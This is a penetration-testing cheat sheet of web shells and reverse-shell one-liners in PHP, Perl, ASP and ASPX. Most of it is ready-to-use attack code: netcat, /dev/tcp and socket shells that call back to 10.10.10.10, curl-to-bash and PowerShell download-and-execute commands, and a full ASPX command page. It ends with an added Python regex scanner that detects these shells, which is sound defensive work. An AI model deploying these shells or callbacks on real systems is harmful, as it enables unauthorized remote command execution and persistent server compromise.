# Web Shell

## PHP Reverse Shell

### PHP - Netcat

{% code overflow="wrap" %}

```php
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 80 >/tmp/f"); ?> 
```

{% endcode %}

### PHP - Bash

```php
<?php
$sock=fsockopen("10.10.10.10",1234);
exec("/bin/bash -i <&3 >&3 2>&3");
?>
```

```bash
php -r '$sock=fsockopen("10.10.10.10",1234);exec("/bin/bash -i <&3 >&3 2>&3");'
```

### PHP Command Execution

```php
# save to a file
<?php system($_REQUEST['cmd']); ?>
<?php system($_GET['cmd']); ?>
<?php system($_REQUEST ["cmd"]); ?>
<?php ${system('nc 10.10.10.10 4444 -e /bin/bash')}; ?>
'<?php passthru("bash -i >& /dev/tcp/10.10.10.10/80 0>&1"); ?>'
```

### PHP - Download

```php
<?php exec("wget -O /var/www/html/shell.php http://10.10.10.10/shell.php"); ?>
```

### PHP - Command Execution

```php
bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' > rev.sh
<?php system('curl 10.10.10.10/rev.sh | bash'); ?>
```

## Perl

{% code overflow="wrap" %}

```
perl -e 'use Socket;$i="10.10.10.10";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
```

{% endcode %}

## ASPX

```basic
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.10.10:5555/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
```

{% code title="cmdasp.aspx" %}

```aspnet
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
```

{% endcode %}

## ASP

{% code overflow="wrap" %}

```basic
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

curl 10.10.10.10/cmd.asp?cmd=whoami
```

{% endcode %}
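
## Detection

For the defending side, the one-liners above share a small set of static traits that a web-root sweep can flag. The following is an added example, not part of the original page; the rule names, sample paths and extension list are assumptions, and the regexes are heuristics that need tuning against your own code base.

```python
import re
from pathlib import Path

# Heuristic signatures for the shell patterns on this page.
# Rule names are made up for this example; expect false positives and tune.
EXEC = r"\b(?:system|passthru|exec|shell_exec|popen|proc_open)\s*\("
RULES = {
    # Request data passed straight to a command-execution function
    "php-exec-of-request-param": re.compile(
        EXEC + r"\s*\$_(?:REQUEST|GET|POST|COOKIE)\s*\[", re.I),
    # Hard-coded command that opens a network channel or fetches a file
    "php-exec-network-command": re.compile(
        EXEC + r"\s*['\"][^'\"]*(?:/dev/tcp/|\bnc\b|mkfifo|\bwget\b|\bcurl\b)", re.I),
    # fsockopen() followed by exec() of an interactive shell
    "php-socket-plus-shell": re.compile(
        r"fsockopen\s*\(.*\bexec\s*\(\s*['\"]/bin/(?:ba)?sh", re.I | re.S),
    # Classic ASP: WScript.Shell object whose Exec method is called
    "asp-wscript-shell-exec": re.compile(
        r"CreateObject\s*\(\s*\"WScript\.Shell\"\s*\).*?\.Exec\s*\(", re.I | re.S),
    # ASP.NET: ProcessStartInfo pointed at cmd.exe and then started
    "aspx-process-start-cmd": re.compile(
        r"ProcessStartInfo.*FileName\s*=\s*\"cmd\.exe\".*Process\.Start", re.I | re.S),
}
SCRIPT_EXTS = {".php", ".phtml", ".asp", ".aspx"}

def scan_text(text):
    """Return the sorted names of all rules that match one file's contents."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan_webroot(root):
    """Walk a web root and map each flagged script path to its rule hits."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCRIPT_EXTS:
            found = scan_text(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

# Constructed samples: snippets as they appear on this page, plus one benign file.
SAMPLES = {
    "uploads/a.php": "<?php system($_REQUEST ['cmd']); ?>",
    "uploads/b.php": '<?php\n$sock=fsockopen("10.10.10.10",1234);\nexec("/bin/bash -i <&3 >&3 2>&3");\n?>',
    "uploads/c.asp": '<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>',
    "site/status.php": '<?php echo htmlspecialchars($_GET["name"]); $up = shell_exec("uptime"); ?>',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, scan_text(body) or "clean")
```

Static matching like this misses obfuscated or encoded shells, so pair it with file-integrity monitoring on the web root and alerts on the web server process spawning `sh`, `bash`, `cmd.exe` or `powershell`.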

